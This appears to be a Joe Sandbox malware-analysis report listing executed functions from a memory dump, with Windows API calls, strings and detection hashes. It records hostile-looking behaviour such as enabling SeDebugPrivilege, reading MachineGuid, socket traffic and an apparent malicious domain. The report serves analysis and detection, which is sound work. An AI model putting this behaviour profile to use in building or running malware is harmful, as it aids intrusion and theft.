Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

